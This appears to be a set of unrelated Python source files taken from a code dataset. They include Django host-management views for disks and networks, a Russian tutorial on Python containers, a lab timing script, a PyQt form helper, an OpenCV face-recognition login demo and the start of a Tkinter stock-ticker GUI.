val['dev_name']})\n nlist.append(res)\n return nlist\n\n\n\"\"\"\n网卡信息\n\"\"\"\n\n\n@params('/host/network/', u'网络信息')\ndef network(request):\n # data = Host.public_node_host('net_info')\n # models.mongodb_cluster_master_node_r()\n # models.mongodb_cluster_master_node_rs()\n net_infos = net_info.objects.all().values()\n net_all_infos = net_all_info.objects.all().values()\n # data = models.net_info.objects.all()\n # te = models.net_all_info.objects.all()\n # te = []\n # for item in data:\n # \tone = item\n # \tip = one['ip']\n # \tdevname = one['dev_name']\n # \tdates = pool.public_api(ip, '/api/nmclic/status', data = {'devname': devname})\n # \tif dates:\n # \t\tdates['wip'] = ip\n # \t\tdates.update(wip = ip)\n # \t\tte.append(dates)\n # \telse:\n # \t\tpass\n for i in net_infos:\n net_info_f = eval(i['net_info'])\n for i in net_all_infos:\n net_all_info_f = eval(i['net_all_info'])\n return render(request, 'host/network.html', {'netdata': net_info_f, 'dates': net_all_info_f})\n\n\n@login_required\ndef netinfo(request):\n data = Host.public_node_host('net_info')\n return JsonResponse(data=data, safe=False)\n\n\n# 获取网卡的详细信息\n@params('/host/card/detail/', u'查看网卡的详细信息')\ndef card_detail(request):\n # data = Host.public_node_host('net_info')\n ip = request.GET['wip']\n devname = request.GET['devname']\n data = pool.public_api(ip, '/api/nmclic/status', data={'devname': devname})\n return JsonResponse(data, safe=False)\n\n\n# 网速速度大小-时时\n@login_required\ndef network_polling(request):\n ip = request.GET['ip']\n devname = request.GET['devname']\n size = Host.netsize(ip, devname)\n # sql = query('select * from cpu_value ORDER BY time DESC limit 20')\n # print(sql)\n # print(size)\n return JsonResponse(data=size, safe=False)\n\n\n\"\"\"\n磁盘管理\n\"\"\"\n\n\n@params('/host/disk/', u'磁盘管理查看')\ndef disk(request):\n try:\n obj = disk_info.objects.all().values()\n for i in obj:\n lists_str = i['disk_info']\n lists = eval(lists_str)\n # data = Host.public_node_host('disk_info_all')\n # models.mongodb_cluster_master_node_rs()\n # data = models.disk_info.objects.all()\n # print(data)\n # print(111111)\n # for i in data:\n # list = i.disk_info\n return render(request, 'host/disk.html', {'result': lists})\n except Exception as e:\n print(e)\n\n\n\"\"\"\n单个设备管理详情(集群单个管理)\n\"\"\"\n\n\n@params('/host/one/disk/', u'查看单个设备')\ndef host_one_disk(request):\n ip = request.GET['ip']\n dev = request.GET['dev']\n data = Host.disk_info_all(ip)\n for val in data:\n if ip == val['ip'] and val['equipment'] == '/dev/' + dev:\n return render(request, 'volume/volume_dev.html', {'val': val})\n return render(request, 'volume/volume_dev.html', {'val': ''})\n\n\n\"\"\"\n判断磁盘格式化状态\n\"\"\"\n\n\n@login_required\ndef disk_status(request):\n ip = request.GET['ip']\n dev = request.GET['dev']\n dev = (dev.split('/'))[2]\n res = pool.public_api(ip, '/api/disk/fstype_disk', data={\"diskName\": dev})\n if res:\n return JsonResponse('yes', safe=False)\n else:\n return JsonResponse('no', safe=False)\n\n\n\"\"\"\n格式化磁盘\n\"\"\"\n\n\n@params('/host/dev/formatting/', u'格式化磁盘')\ndef formatting(request):\n ip = request.GET['ip']\n dev = request.GET['dev']\n dev = (dev.split('/'))[2]\n res = pool.public_api(ip, '/api/disk/format_disk', data={\"diskName\": dev})\n if res:\n return JsonResponse('yes', safe=False)\n else:\n return JsonResponse('no', safe=False)\n\n\n\"\"\"\n磁盘挂载\n\"\"\"\n\n\n@params('/host/dev/mount/', u'操作磁盘挂载')\ndef disk_mount(request):\n ip = request.GET['ip']\n dev = request.GET['dev']\n dev = (dev.split('/'))[2]\n res = pool.public_api(ip, '/api/disk/mount_disk', data={\"diskName\": dev})\n if res:\n return JsonResponse('yes', safe=False)\n else:\n return JsonResponse('no', safe=False)\n\n\n\"\"\"\n磁盘卸载\n\"\"\"\n\n\n@params('/host/dev/umount/', u'操作磁盘卸载')\ndef disk_umount(request):\n ip = request.GET['ip']\n dev = request.GET['dev']\n dev = (dev.split('/'))[2]\n res = pool.public_api(ip, '/api/disk/umount_disk', data={\"diskName\": dev})\n if res:\n return JsonResponse('yes', safe=False)\n else:\n return JsonResponse('no', safe=False)\n\n\n@login_required\ndef cpu_info(request):\n data = Host.public_node_host('cpu_all_info')\n # print(data)\n # print(21321321321321)\n # sql = [res for res in query('select * from cpu_value ORDER BY time DESC limit 1')]\n # print(sql)\n # print(1111111111111111111111111111111111)\n # data = Host.public_node_host('cpu_a_info')\n return JsonResponse(data=data, safe=False)\n\n\n\"\"\"\n查看内存信息\n\"\"\"\n\n\n@params('/host/memory/', u'内存信息查看')\ndef memory(request):\n # data = Host.public_node_host('memory_info')\n # models.mongodb_cluster_master_node_rs()\n # data = models.Memory_info.objects.all()\n data = Memory_info.objects.all().values()\n for i in data:\n ins = i['Memory_infos']\n lists = eval(ins)\n return render(request, 'host/memory.html', {'result': lists})\n\n\n# 获取所有 安装服务器节点\n@login_required\ndef host_online_ip(request):\n getip = pool.get_ip()\n return JsonResponse(data=getip, safe=False)\n\n\n@login_required\ndef host_ip_nodename(request):\n getip = pool.get_ip_nodename()\n return JsonResponse(data=getip, safe=False)\n","sub_path":"www/hostapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"222810335","text":"import shutil\nimport platform\nimport os\n\nversion = '1.14.0'\ndestdir = os.path.join(version, '{0}-{1}'.format(platform.system(), platform.architecture()[0]))\nos.makedirs(destdir)\nprint('moving NFSIm to {0}\\n'.format(destdir))\nif platform.system() != 'Windows':\n shutil.move('NFsim', os.path.join(destdir, 'NFsim'))\nelse:\n shutil.move('NFsim.exe', os.path.join(destdir, 'NFsim.exe'))\n","sub_path":"dist/changeFilename.py","file_name":"changeFilename.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"367960599","text":"# Методы\nprint(\"Привет\".upper())\nprint(\"Привет\".replace(\"е\", \"@\"))\n# Списки\nfruit = list()\nprint(fruit)\nfruit = []\nprint(fruit)\nfruit = [\"Яблоко\", \"Апельсин\", \"Персик\" ]\nfruit.append(\"Банан\")\nfruit.append(\"Дыня\")\nprint(fruit)\n\nrandom = []\nrandom.append(True)\nrandom.append(100)\nrandom.append(1.1)\nrandom.append(\"Рандом\")\nprint(random)\n\nfruit = [\"Яблоко\", \"Апельсин\", \"Персик\"]\nprint(fruit[0])\nprint(fruit[1])\nprint(fruit[2])\n\ncolors = [\"синий\", \"зелёный\", \"жёлтый\"]\ntry:\n print(colors[3])\nexcept IndexError:\n print(\"Ошибка индекса\")\n\ncolors = [\"синий\", \"зелёный\", \"жёлтый\"]\nprint(colors)\ncolors[2] = \"красный\"\nprint(colors)\n\n\nprint(colors.pop())\nprint(colors)\ncolors.pop()\nprint(colors)\ncolors.pop()\n\ncolors_matrica = [\"синий\", \"красный\", \"зелёный\"]\ncolors = [\"фиолетовый\", \"коричневый\", \"жёлтый\"]\ncolors_matrica.pop()\nprint(colors_matrica + colors)\nprint(\"фиолетовый\" in colors)\nprint(\"черный\" not in colors + colors_matrica)\n\nprint(\"В списке 'colors_matrica'\".replace(\"'\", '\"'), len(colors_matrica), \"элементов\")\n\n# Пример использования списка на практике в файле \"Списки.py\"\n\n#=================================================================================================================================\nprint(\"Кортежи\".upper())\n# Кортежи\n# Два варианта создания кортежа:\nmy_tuple = tuple()\nprint(my_tuple)\n\nmy_tuple = ()\nprint(my_tuple)\n\n# Добавление объектов в кортеж через второй способ\n\nrndmeme = (\"оооо либераху порвало\", \"Я: \", False)\nprint(rndmeme)\n# Даже при одном элементе нужно после него ставить запятую\nnumber = (27,)\nprint(number)\n\n# При попытке добавить или изменить содержимое картежа сгенерируется исключение\n# Получение осуществляется так же, как и в списках:\ndys = (\"1984\", \"О дивный новый мир\", \"451 градус по Фаренгейту\")\nprint(dys[0])\n# Проверка содержимого в кортеже\nprint(\"О дивный новый мир\" in dys)\nprint(\"Мы\" not in dys)\n# Кортежи удобны при работе со значениями, которые никода не меняются. Они могут гарантировать,\n# что другие части программы их не изменят.\n\n#=================================================================================================================================\n\nprint(\"Словари\".upper())\n# Словари\n# Два варианта создания словарей:\nmy_dict = dict()\nprint(my_dict)\n\nmy_dict = {}\nprint(my_dict)\n\n# Добавление пары ключ-значение при создании словарей:\nfruits = {\"Яблоко\":\n \"красное\"}\nfruits = {\"Яблоко\":\n \"красное\",\n \"Банан\":\n \"жёлтый\"}\nprint(fruits)\n\n\n# Пример изменения словаря:\n\nfacts = dict()\n\n# Добавление значения\nfacts[\"код\"] = \"смешной\"\n# Поиск значения при помощи ключа\nprint(facts[\"код\"])\n\nfacts[\"Билл\"] = \"Гейтс\"\nprint(facts[\"Билл\"])\n\nfacts[\"основание\"] = 1776\nprint(facts[\"основание\"])\n\n# Значением в словаре может быть любой объект. Ключ словаря должен быть неизменяем - может быть или строкой, или кортежем.\n# Слово in нельзя использовать для проверки наличия в словаре значеия.\n\nbill = dict({\"Билл Гейтс\":\n \"щедрый\"})\nprint(\"Билл Гейтс\" in bill)\n\n# Если попытаться получить доступ к словарю, отсутствующему в словаре, Python сгенерирует исключение.\nprint(\"Билл Дорз\" not in bill)\n\n# Удаление их списка пары ключ-значение:\nbooks = {\"Дракула\": \"Стокер\",\n \"1984\": \"Оруэлл\",\n \"Процесс\": \"Кафка\"}\nprint(books)\ndel books[\"Процесс\"]\nprint(books)\n\n# Пример программы, использующей словарь\nrhymes = {\"1\": \"смех\",\n \"2\": \"синий\",\n \"3\": \"я\",\n \"4\": \"этаж\",\n \"5\": \"жизнь\"}\n\nn = 3\nif n in rhymes:\n print(rhymes[n])\nelse:\n print(\"Не найдено.\")\n \nprint(rhymes)\n\n#=================================================================================================================================\n# Контейнеры внутри контейнеров\nprint(\"Контейнеры внутри контейнеров\".upper())\n\nlists = []\nrap = [\"Баста\", \"Кравц\", \"Злой дух\",]\nrock = [\"Наутилус Помпилиус\", \"Кино\", \"Ария\"]\ndjs = [\"Paul Oakenfold\", \"Tiesto\"]\n\nlists.append(rap)\nlists.append(rock)\nlists.append(djs)\n\nprint(lists)\n# Получение доступа к списком через индекс\nprint(lists[2])\n\nlists[2].append(\"Srillax\")\nprint(lists[2])\n# Или через названия подсписков\nrap.append(\"Оксимирон\")\n\nprint(lists[0][3]) # Вывод: Оксимирон. 1 индекс - список rap.\n # 2 индекс - элемент \"Оксимирон\"\n\n# Кортежи внутри списка:\nlocations = []\n\ntula = (54.1960, 37.6182)\nmoscow = (55.7522, 37.6155)\n\nlocations.append(tula)\nlocations.append(moscow)\n\nprint(locations)\n\n\n# Списки внутри кортежа\n\neights = [\"Эдгард Алан По\",\n \"Чарльз Диккенс\"]\nnines = [\"Хемингуэй\",\n \"Фицджеральд\",\n \"Оруэлл\"]\n\nauthors = (eights, nines)\nprint(authors)\neights.append(\"Ноу Нейм\")\nprint(authors)\n# P.S. списки изменять можно, кортеж нет\n\nbday = {\"Хемингуэй\": \"21.07.1899\",\n \"Фицджерпльд\": \"24.09.1896\"}\n# Словарь внутри списка\nmy_list = [bday]\nprint(my_list)\n# Словарь внутри кортежа\nmy_tuple = (bday,)\nprint(my_tuple)\n\n# Список, кортеж или словарь могут быть значеними в словаре.\nru = {\"рсположение\": (55.7522, 37.6155),\n \"знаменитости\": [\"Андрей Звягинцев\",\n \"Юрий Дудь\",\n \"Владимир Путин\"],\n \"факты\": {\"столица\": \"Москва\",\n \"страна\": \"Россия\"}\n}\n\nprint(ru)\n\n\n#=================================================================================================================================\n\n# Множества.\nprint('Множество'.upper())\n\n# Множества - это структура данных, которая содержит неупорядочные неиндексированные эле��енты.\n# Множества позволяет внесение и удаление элементов.\n# Существет ряд особенностей, которые определяют множество от других структур данных:\n# множества не содеражат дубликаты элементов;\n# элементы множества являются неименяемыми,однако само по себе множетсов является изменяемым, и его можно менять;\n# Так как элементы не индексируются, множества не поддерживают никаких операций среза и индексирования.\n\n# Создание множества.\nprint(\"Создание множеств\".upper())\n\n# Множество может содеражать любое количество элементов и элементы могут быть разных типов,\n# к примеру, целые числа, строки, кортежи и т.д.\n# Однако, множество не поддерживает изменяемые элементы, такие как списки, словари, и так далее.\n# Существует два способа создания множества:\n\n# Можно создать множества путём передачи всех элементов множества внутри фигурных скобок {} и разделить элементы при помощи (,)\nnum_set = {1, 2, 3, 4, 5, 6}\nprint(num_set)\n\nstring_set = {\"Nicholas\", \"Michelle\", \"John\", \"Mercy\"}\nprint(string_set)\n\n# Элементы выдачи могут находится в произвольном порядке.\nmixed_set = {2.0, \"Nicholas\", (1, 2, 3)}\nprint(mixed_set)\n\n\n\n# Можно создать множество из списков.\nnum_set = set([1, 2, 3, 4, 5, 6])\nprint(num_set)\n\n\n# Множество не содержит дубликато элементов:\nnum_set = set([1, 2, 3, 1, 2])\nprint(num_set)\n# Множество удалило дубликаты 1 и 2\n# Это также происходит при создании множества с нуля:\nnum_set = {1, 2, 3, 1, 2}\nprint(num_set)\n\n\n# Создание пустого множества подразумевает определённую хитрость\n# Если использовать пустые фигурные скобки, то создастся пустой словарь, а не множество. Например:\nx = {}\nprint(type(x))\n# Чтобы создать пустое множество, нужно использовать фунцию set()\nx = set()\nprint(type(x))\n\n\n\n\n# Проверка наличия эелемента во множестве при помощи in\nmonths = set([\"Jan\", \"Feb\", \"March\", \"Apr\", \"May\", \"June\", \"Jule\", \"Aug\", \"Sep\", \"Oct\", \"Nov\", \"Dec\"])\nprint(\"May\" in months)\nprint(\"John\" not in months)\n\n\n\n# Добавление элементов во множество при помощи фунции add().\nmonths = set([\"Jan\", \"March\", \"Apr\", \"May\", \"June\", \"Jule\", \"Aug\", \"Sep\", \"Oct\", \"Nov\", \"Dec\"])\nprint(months)\n\nmonths.add(\"Feb\")\nprint(months)\n\n\nnum_set = {1, 2, 3}\nnum_set.add(4)\nprint(num_set)\n# При добавлении изменяемых элементов во множество (списков, словарей и т.д.) выйдет исключение TypeError.\n\n\n# Удаление элемента из множеств\n# Элементы могут быть удалены при помощи методов discard() и remove()\n\nnum_set = {1, 2, 3, 4, 5, 6} \nnum_set.discard(3) \nprint(num_set)\n\nnum_set = {1, 2, 3, 4, 5, 6} \nnum_set.remove(3) \nprint(num_set)\n\n# Метод discard() не будет выдавать ошибку, если элемент не найден в отличии от remove()\n\nnum_set = {1, 2, 3, 4, 5, 6} \nnum_set.discard(7) \nprint(num_set)\n\ntry:\n num_set = {1, 2, 3, 4, 5, 6} \n num_set.remove(7) \n print(num_set)\nexcept KeyError:\n print(\"Ошибка: этого элемента нет во множестве.\")\n\n# С методом pop(), можно удалить и вернуть элемент.\n# Так как элементы находятся в произвольном порядке, нельзя утверждать или предсказать, какой элемент будет удален.\n# Пример:\nnum_set = {1, 2, 3, 4, 5, 6}\nprint(num_set.pop())\n\n# Можно использовать этот метод при удалении элемента и возврате элементов, которые остаются во множестве. Например:\n\nnum_set = {1, 2, 3, 4, 5, 6} \nnum_set.pop() \nprint(num_set)\n\n# Метод clear() поможет удалить все элементы во множестве. Например:\n\nnum_set = {1, 2, 3, 4, 5, 6} \nnum_set.clear()\n\nprint(num_set)\n\n\n# Объединение множеств.\n# Операция объединения двух или более множеств union().\n# Пример:\n\nmonths_a = set([\"Jan\", \"Feb\", \"March\", \"Apr\", \"May\", \"June\"]) \nmonths_b = set([\"July\", \"Aug\", \"Sep\", \"Oct\", \"Nov\", \"Dec\"])\n\nall_months = months_a.union(months_b) \nprint(all_months)\n\n#\n\nx = {1, 2, 3} \ny = {4, 5, 6} \nz = {7, 8, 9}\n\noutput = x.union(y, z)\n\nprint(output)\n\n# При выполнении операции объединения, дубликаты игнорируются, так что только один из двух элементов дубликатов будет отображаться.\n\nx = {1, 2, 3} \ny = {4, 3, 6} \nz = {7, 4, 9}\n\noutput = x.union(y, z)\n\nprint(output)\n\n# Оператор | может также использоваться при поиске объединения двух или более множеств. Например:\n\nmonths_a = set([\"Jan\", \"Feb\", \"March\", \"Apr\", \"May\", \"Jun\"])\nmonths_b = set([\"July\", \"Aug\", \"Sep\", \"Oct\", \"Nov\", \"Dec\"])\n\nprint(months_a | months_b)\n\n#\n\nx = {1, 2, 3} \ny = {4, 3, 6} \nz = {7, 4, 9}\n\nprint(x | y | z)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Уроки/Часть I. Введение в програмирование/Глава 5. Контейнеры.py","file_name":"Глава 5. Контейнеры.py","file_ext":"py","file_size_in_byte":13630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"365210397","text":"from stipy import *\n \nns = 1.0\nus = 1000.0\nms = 1000000.0\ns = 1000000000.0\n\n# Set description used by program\nsetvar('desc','''Turn TAs On.''')\n\ninclude(\"channels.py\")\ninclude(\"experimentalParameters.py\")\n\n# Define different blocks of the experiment\ndef turnTAsOn(Start):\n \n\n #Initialization Settings\n tStart =1*ms\n\n ## TA Settings ##\n tTAOn = tStart + 10*ms\n\n\n event(TA1, tTAOn, voltageTA1) # TA 1 on\n event(TA2, tTAOn + 1*ms, voltageTA2) # TA 2 on \n event(TA3, tTAOn + 2*ms, voltageTA3) # TA 3 on\n event(TA4, tTAOn + 3*ms, ta4MotVoltage) # TA 4 on\n# event(TA5, tTAOn + 4*ms, 0) # TA 5 off\n# event(TA6, tTAOn + 5*ms, 0) # TA 6 off\n event(TA7, tTAOn + 2.5*ms, ta7MotVoltage) # TA 7 on\n\n return Start\n\n\n# Global definitions\n\nt0 = 10*us\n\ntime = t0\ntime = turnTAsOn(time)\n","sub_path":"timing/turnTAsOn.py","file_name":"turnTAsOn.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"379099531","text":"# makeInform.py\r\nimport sys\r\nfrom PyQt5.QtWidgets import *\r\nfrom PyQt5.QtCore import *\r\n\r\n\r\nclass MakeInform():\r\n def __init__(self):\r\n query = {}\r\n\r\n def makeQuery(self, widgetLst, req):\r\n # print(\"들어옴\")\r\n self.query = {}\r\n if req==1: # alarm\r\n time = widgetLst[0].dateTime()\r\n self.query[\"time\"] = time.toString(Qt.DefaultLocaleShortDate)\r\n inform = widgetLst[1].toPlainText()\r\n self.query[\"inform\"] = inform\r\n # print(self.query)\r\n\r\n elif req==2: # symptom\r\n time = widgetLst[6].dateTime()\r\n self.query[\"time\"] = time.toString(Qt.DefaultLocaleShortDate)\r\n symptom = widgetLst[0].toPlainText()\r\n self.query[\"symptom\"] = symptom\r\n level = 0\r\n if widgetLst[1].isChecked():\r\n level = 1\r\n elif widgetLst[2].isChecked():\r\n level = 2\r\n elif widgetLst[3].isChecked():\r\n level = 3\r\n elif widgetLst[4].isChecked():\r\n level = 4\r\n elif widgetLst[5].isChecked():\r\n level = 5\r\n self.query[\"level\"] = level\r\n\r\n if req==3: # action\r\n time = widgetLst[0].dateTime()\r\n self.query[\"time\"] = time.toString(Qt.DefaultLocaleShortDate)\r\n action = widgetLst[1].toPlainText()\r\n self.query[\"action\"] = action\r\n\r\n # print(\"makeQuery끝\")\r\n return self.query\r\n","sub_path":"makeInform.py","file_name":"makeInform.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"608103886","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 9 16:05:54 2016\n\n@author: eduardo.oest.moreira\n\"\"\"\n\nfrom tkinter import *\nclass popup:\n def __init__(self,toplevel):\n self.fr1 = Frame(toplevel)\n self.fr1.pack()\nimport tkinter as tk\nimport cv2\nimport csv\nfrom PIL import Image, ImageTk\nimport numpy as np\nfrom tinyfacerec.util import read_images, asRowMatrix\nfrom tinyfacerec.model_Eduardo import FisherfacesModel, EigenfacesModel\n\nhaarscade_path=(r'C:\\Users\\eduardo.oest.moreira\\AppData\\Local\\Continuum\\Anaconda3\\haarcascades\\haarcascade_frontalface_default.xml')\nimages_path=(r'C:\\Users\\eduardo.oest.moreira\\Pictures\\Fotos')\nimages2_path=(r'C:\\Users\\eduardo.oest.moreira\\Pictures\\Fotos2\\user.jpg')\nimages3_path=(r'C:\\Users\\eduardo.oest.moreira\\Pictures\\Fotos2\\user_1.jpg')\ndatos_csv=(r'C:\\Users\\eduardo.oest.moreira\\Documents\\Davivienda\\Book1.csv')\nfaceCascade = cv2.CascadeClassifier(haarscade_path)\nvideo_capture = cv2.VideoCapture(0)\n[X , y] = read_images (images_path)\nmodel = FisherfacesModel(X[0:], y[0:])\nmodel2 = EigenfacesModel(X[0:], y[0:])\nc = 0\nroot = tk.Tk()\nroot.bind('', lambda e: root.quit())\nlmain = tk.Label(root)\nlmain.pack(side=LEFT)\npassword=tk.Entry(root, bd=5, show=\"*\")\npassword.config(font=('Arial', 8, 'bold', 'italic'))\npassword.pack()\nresponse=tk.Text(root, width=20, height=1)\nresponse.config(font=('Arial', 8, 'bold', 'italic'))\nresponse.pack()\nnombre=tk.Text(root, width=20, height=1)\nnombre.config(font=('Arial', 8, 'bold', 'italic'))\nnombre.pack()\nresume=tk.Text(root, width=35, height=20)\nresume.config(font=('Arial', 8, 'bold', 'italic'))\nresume.pack()\ndist=dict()\ndef reconocimiento_face():\n mod='xxx'\n abc=''\n name='xxx'\n resultado='false'\n passw=''\n perc=0\n perc0=0\n #Capture frame-by-frame\n ret, frame = video_capture.read()\n\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n \n faces = faceCascade.detectMultiScale(\n gray,\n scaleFactor=1.3,\n minNeighbors=5,\n minSize=(30, 30),\n #flags=cv2.CV_HAAR_SCALE_IMAGE\n flags=cv2.CASCADE_SCALE_IMAGE\n )\n #help(cv2)\n # Draw a rectangle around the faces\n c=0\n for (x, y, w, h) in faces:\n c = 0\n if c < 1:\n cv2.imwrite(images2_path, gray, [cv2.IMWRITE_JPEG_QUALITY, 90])\n im = Image.open(images2_path)\n crop_im = im.crop((x,y,x+w,y+h))\n crop_im = crop_im.resize((300,300), Image.ANTIALIAS)\n crop_im.save(images3_path)\n c = c+1\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)\n try:\n #basewidth = 112\n image = Image.open(images3_path)\n image = image.convert(\"L\")\n xx = np.asarray(image, dtype=np.uint8)\n except IOError : \n print (\"I/O error(0): 1\".format(errno, strerror))\n except:\n print (\"Unexpected error:\", sys.exc_info()[0])\n raise \n mod = model.predict(xx)\n dist=model.dist_faces(xx)\n #Número de Caras\n # Display the resulting frame\n frame2 = cv2.flip(frame, 1)\n cv2image = cv2.cvtColor(frame2, cv2.COLOR_BGR2RGBA)\n if c>0:\n #minimo=dist[min(dist, key=dist.get)]\n minimo=0\n maximo=dist[max(dist, key=dist.get)]\n den=maximo-minimo\n for k,v in dist.items():\n perc0=round(1-((v-minimo)/den),2)\n abc= abc + k + ': ' +str(perc0) +'\\n'\n if perc0>perc:\n perc=perc0\n name=k\n cv2.putText(cv2image, name,\n org = (300,400), \n fontFace = cv2.FONT_HERSHEY_DUPLEX, \n fontScale = 2, \n color = (0,0,255),\n thickness = 2,\n lineType = cv2.LINE_AA\n ) \n input1=nombre.get('1.0',END)\n if input1!=mod:\n nombre.delete('1.0',END)\n resume.delete('1.0',END)\n response.delete('1.0',END)\n nombre.insert(INSERT, mod)\n resume.insert(INSERT, (abc+'\\n'))\n with open(datos_csv) as csvfile2:\n readCSV2 = csv.reader(csvfile2, delimiter=',')\n for client in readCSV2:\n client_name=client[0]\n if name==client_name:\n passw=password.get()\n if passw==client[1]:\n resultado='true'\n else:\n resultado='false'\n response.insert(INSERT, resultado)\n \n if mod=='xxx': \n nombre.delete('1.0',END)\n resume.delete('1.0',END)\n response.delete('1.0',END)\n img = Image.fromarray(cv2image)\n imgtk = ImageTk.PhotoImage(image=img)\n lmain.imgtk = imgtk\n lmain.configure(image=imgtk)\n lmain.after(10, reconocimiento_face)\n return mod\nreconocimiento_face()\npopup(root)\nroot.mainloop()\nvideo_capture.release()\ncv2.destroyAllWindows()","sub_path":"src/main/resources/Reconhecimento.py","file_name":"Reconhecimento.py","file_ext":"py","file_size_in_byte":5058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"557081775","text":"'''\n2.6\nImplementar un programa que lea un número real y muestre si elnúmero es positivo\n'''\n\n# Lectura de la informacio\na = int(input(\"Escriu un enter i et diré si es positiu \"))\n\n# Mostram resultats\nif a > 0: # si el valor que guardam dins la variable a es estrictament major a 0\n print(\"El nombre es positiu\")\nelse: # sino\n print(\"No ho es\")","sub_path":"Exercicis/Tema2/2_6.py","file_name":"2_6.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"375131146","text":"\"\"\" Import GUI \"\"\"\r\nfrom tkinter import *\r\nfrom tkinter import filedialog \r\n\r\n\"\"\" Import for Traceback errors \"\"\"\r\nimport sys\r\nimport traceback \r\n\r\n\"\"\" import os to run excel \"\"\"\r\nimport os \r\nimport subprocess \r\n\"\"\" import time tracker \"\"\"\r\nimport timeit\r\n\r\n\"\"\" Import urllib and csv for Fidelity Daily Report prices \"\"\"\r\nimport urllib.request\r\nimport csv \r\nimport codecs \r\n\"\"\" import date and create now variable\"\"\"\r\nimport datetime\r\nnow = datetime.datetime.now()\r\n\r\n\"\"\" Import Pandas Library \"\"\"\r\nimport pandas as pd\r\nimport pandas.io.data \r\nfrom pandas import Series, DataFrame\r\nfrom pandas import ExcelWriter \r\nfrom pandas import read_csv \r\n\r\n\"\"\"Import Matplot Library \"\"\"\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib as mpl\r\nmpl.rc('figure', figsize=(8,7))\r\n\r\n\r\n\"\"\" Onclick Function to close windows from 'Submit' Buttons \"\"\"\r\n\r\ndef onclick():\r\n\tglobal file \r\n\tglobal file_list \r\n\tfile = None \r\n\tfile_list = None \r\n\troot.destroy() \r\ndef onclick2():\r\n\troot2.destroy()\r\ndef onclick3():\r\n\troot3.destroy() \r\ndef onclick4():\r\n\troot4.destroy() \r\ndef onclick5():\r\n\tglobal text_lines\r\n\tglobal text_lines_two\r\n\tglobal text_lines_one \r\n\t\r\n\ttext_lines_start = Multiple_List_Variable.get(\"1.0\",'end').splitlines()\r\n\ttext_lines_one = [i.split(',') for i in text_lines_start]\r\n\ttext_lines_one = [[i.strip() for i in inner] for inner in text_lines_one]\r\n\ttext_line_two = [item for sublist in text_lines_one for item in sublist] \r\n\ttext_line_three = [words for segments in text_line_two for words in segments.split()]\r\n\tprint(text_lines_one) \r\n\tprint(text_line_two) \r\n\tprint(text_line_three)\r\n\tno_weird_characters = str.maketrans(\"\", \"\", \"+=,?!-_\")\r\n\ttext_lines = [s.translate(no_weird_characters) for s in text_line_three]\r\n\ttext_lines = list(filter(None, text_lines))\r\n\ttext_lines = [i.strip() for i in text_lines]\r\n\troot5.destroy()\r\n\tprint(text_lines) \r\n\treturn text_lines \t\r\ndef onclick6():\r\n\tglobal manual_file_entry\r\n\tmanual_file_entry = 1 \r\n\troot6.destroy() \r\n\r\n\"\"\" Button functions for browsing files \"\"\" \r\ndef file_onclick():\r\n\tglobal file \r\n\tglobal file_list \r\n\tfile = filedialog.askopenfile(parent=root2, mode='r', title = 'Choose a file')\r\n\tif file != None:\r\n\t\twith file as infile:\r\n\t\t\tfile_list = [line.strip() for line in infile]\r\n\t\t\tfile.close()\r\n\t\troot2.destroy() \r\n\t\treturn file_list \r\n\t \r\n\treturn file \r\ndef file_onclick2():\r\n\tglobal new_file\r\n\tglobal manual_file_entry \r\n\tnew_file = filedialog.asksaveasfilename(parent = root6, title = 'Save New File', defaultextension = '.xlsx')\r\n\tmanual_file_entry = 0 \r\n\troot6.destroy() \r\n\r\n\"\"\" Start GUI \"\"\"\r\nroot = Tk()\r\nw = 400\r\nh = 200 \r\nws = root.winfo_screenwidth() \r\nhs = root.winfo_screenheight() \r\nx = (ws/2) - (w/2) \r\ny = (hs/2) - (h/2) \r\n\r\nw1 = 250 \r\nh1 = 25\r\nroot.title(\"File Upload\")\r\nroot.geometry('%dx%d+%d+%d' % (w1, h1, x, y))\r\n\r\napp = Frame(root)\r\napp.grid() \r\nlabel = Label(app, text = \"\") \r\n\r\nlabel.grid() \r\n\r\n\"\"\"Create list of Tickers\"\"\"\r\n# Text variables for the GUI\r\nAnswer_Control = StringVar() \r\nAnswer = StringVar() \r\n\r\n\"\"\" Ask for File \"\"\"\r\n\r\n# GUI 1: Ask whether there is a file to upload\t\r\nFile_or_Manual_Instructions = Label(text = \"Do you have a file to upload?\")\r\nFile_or_Manual_Instructions.grid(row = 0, column = 0, sticky = W)\r\nFile_or_Manual_Entry_Yes = Radiobutton(text = \" Yes \", variable = Answer_Control, value = 'Y', indicatoron = 0, command = onclick).grid(row = 0, column = 10, columnspan = 1, sticky = W)\r\nFile_or_Manual_Entry_No = Radiobutton(text = \" No \", variable = Answer_Control, value = 'N', indicatoron = 0, command = onclick).grid(row = 0, column = 15, columnspan = 1, sticky = E)\r\n\r\n \r\nroot.mainloop()\r\nFile_or_Manual = Answer_Control.get() \r\n \r\nprint(File_or_Manual) \r\n\r\n\r\n\r\n\r\n\r\n#GUI 2: Is this a single stock, list of stocks, or Daily Report?\r\n\r\nif File_or_Manual == \"N\":\r\n\t# Create new root \r\n\troot3 = Tk()\r\n\troot3.title('List Type')\r\n\tw3 = 220\r\n\th3 = 60\r\n\troot3.geometry('%dx%d+%d+%d' % (w3, h3, x, y))\r\n\tapp = Frame(root3)\r\n\tapp.grid()\r\n\tEntry_Type = StringVar() 